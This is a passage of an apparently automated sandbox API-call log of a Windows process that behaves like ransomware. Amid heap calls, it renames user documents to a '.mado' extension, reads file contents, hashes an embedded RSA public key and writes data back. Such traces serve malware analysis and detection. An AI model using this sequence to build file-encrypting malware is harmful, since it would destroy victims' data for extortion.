hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.181] GetCurrentThreadId () returned 0x600 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b70f70 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68390 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.181] GetCurrentThreadId () returned 0x600 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68180 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68498 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68288 [0204.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.184] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12f05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.184] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.184] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.184] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.185] CloseHandle (hObject=0x63c) returned 1 [0204.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.186] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\w3umcQyTn4DRJs88m7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\w3umcqytn4drjs88m7.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\w3umcQyTn4DRJs88m7.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\w3umcqytn4drjs88m7.xlsx.mado")) returned 1 [0204.187] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87baf2e0, ftCreationTime.dwHighDateTime=0x1d5dd17, ftLastAccessTime.dwLowDateTime=0xcdeeea10, ftLastAccessTime.dwHighDateTime=0x1d5dc0d, ftLastWriteTime.dwLowDateTime=0xcdeeea10, ftLastWriteTime.dwHighDateTime=0x1d5dc0d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wx7uR8WZdnzLGz3ii8Q.ods", cAlternateFileName="WX7UR8~1.ODS")) returned 1 [0204.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.188] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Wx7uR8WZdnzLGz3ii8Q.ods") returned=".ods" [0204.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Wx7uR8WZdnzLGz3ii8Q.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wx7ur8wzdnzlgz3ii8q.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.189] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=52558) returned 1 [0204.189] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.191] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcd28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.191] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.193] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xcd4e, lpOverlapped=0x0) returned 1 [0204.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.194] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.195] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.195] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.195] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.195] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.195] GetLastError () returned 0x0 [0204.195] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.195] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.195] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.195] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.195] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.195] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0204.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe118 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe100 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bdb0 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bec8 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.196] GetCurrentThreadId () returned 0x600 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68078 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71000 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68498 [0204.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.197] GetCurrentThreadId () returned 0x600 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68390 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b68288 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe130 [0204.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.198] 